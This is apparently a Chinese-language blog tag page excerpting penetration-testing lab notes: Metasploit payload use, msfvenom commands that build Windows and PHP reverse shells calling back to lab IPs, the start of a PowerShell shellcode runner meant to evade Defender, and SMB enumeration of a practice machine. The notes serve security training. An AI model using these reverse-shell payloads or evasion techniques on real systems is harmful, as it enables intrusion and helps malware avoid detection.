發表文章

目前顯示的是有「msfvenom」標籤的文章

Metasploit Payloads

圖片
 Metasploit Payloads 接續上一節,在 Apache 2.4.49 選擇模組中選了 0 後可以查看相關 payload 輸入 show payloads,可以看到下圖的 17 是我們上一節使用的 payload   這次要利用的是 11,payload/linux/x64/meterpreter_reverse_https set payload payload/linux/x64/meterpreter_reverse_https use 11,show options 看一下要輸入那些值,看到有個 LURI 的值 run 之後輸入 shell 直接查找檔案 passwords 然後 cat 拿 flag Metasploit 還提供將有效負載匯出為各種檔案類型和格式的功能,例如 Windows 和 Linux 二進位檔案、Webshel​​l 等。Metasploit 包含 msfvenom 作為產生這些有效負載的獨立工具。它提供標準化的命令列選項,並包括各種自訂有效負載的技術。 為了熟悉 msfvenom,我們首先建立一個惡意 Windows 二進位文件,啟動原始 TCP 反向 shell。讓我們先列出所有有效負載,並將有效負載作為-l的參數。此外,我們使用 --platform指定有效負載的平台,並使用--arch 指定架構。 指令 └─$ msfvenom -l payloads --platform windows --arch x64 讓我們使用 -p 標誌來設定有效負載,設定 LHOST 和 LPORT 來分配反向連接的主機和端口 參數 -f 來設定輸出格式(在本例中為 exe),以及 -o 來指定輸出檔案姓名 針對上述我們看到的一個有效 payload 作設置,  windows/x64/shell_reverse_tcp 指令 : msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.186 LPORT=443 -f exe -o nonstaged.exe 建立一個 123.pHP payload └─$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.45.186 ...

防毒軟體規避

圖片
 防毒軟體規避 列出一個檔案的 SHA 256 HASH 指令 └─$ sha256sum post.txt    列出一個檔案的二進制與 ASCII 格式使用 xxd 指令 └─$ xxd -b post.txt                           透過 msfvenom 包一個 reverse shell 的 exe payload,檔名為 binary.exe └─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=4444 -f exe > binary.exe 將檔案 COPY 到裝有 Defender 的 Windows 系統會馬上跳出如下的告警 判定為 Trojan 木馬後門程式並直接隔離無法使用 上傳到 VirusTotal 也是偵測出為木馬後門程式 接著來手動作一個 PowerShell PS 腳本如下 =================================================================== $code = ' [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr dest, uint sr...

公開的漏洞(Public Exploits) - 練習

圖片
 公開的漏洞(Public Exploits) - 練習 練習 1 (12.4.1.1) 靶機 IP : 192.168.225.10 先 rustscan └─$ rustscan -a 192.168.223.10 --scripts none --ulimit 500 135、139、445、1978、跟一堆 RPC High Port 看來是台 Windows,445 SMB 看來較有機會 用 nmap 帶 script 掃一下 OS 看看 └─$ sudo nmap -v -p 139,445 --script  smb-os-discovery 192.168.225.10 是台 Windows 10 獨立機器無 Domain,主機名稱是 remotemouse 接著看看 445 有沒有 Share 甚麼資料夾 └─$ sudo nmap -sV -sC -p 139,445 192.168.225.10 --script smb-enum-shares.nse script 預設帶的帳號是 guest,發現有一個分享名稱 offsec 擁有讀寫的權限 登入看看有甚麼東西 └─$ smbclient '\\192.168.225.10\offsec' -U guest,詢問密碼時直接 Enter 即可 好多檔案阿,那就逛一逛吧 使用 curl 指令丟個 body.txt 檔案上去試試看 └─$ curl --upload-file /home/kali_r/body.txt  -u 'workgroup\guest' smb://192.168.225.10/offsec/ 不用 curl 在 smb 底下也可以直接使用 put 指令上傳檔案,刪除檔案使用 rm 重新 dir 一下,看到該路徑確實可以寫入檔案 逛了一下整個 offsec 的目錄與相關檔案,僅有 Downloads 路徑下有幾個檔案 主要是三個 *.exe 檔案跟最後一個圖檔(下載回來看過了沒啥鳥用) 第一個檔案 7z2200-x64.exe,是 7-ZIP 22 版安裝程式,依據資安人口理論 Google 搜尋 7z2200-x64.exe exploit 看來沒啥鳥用 第二個檔案 ccsetup601.exe,是 CCLear 6.01.xx 版安裝程式...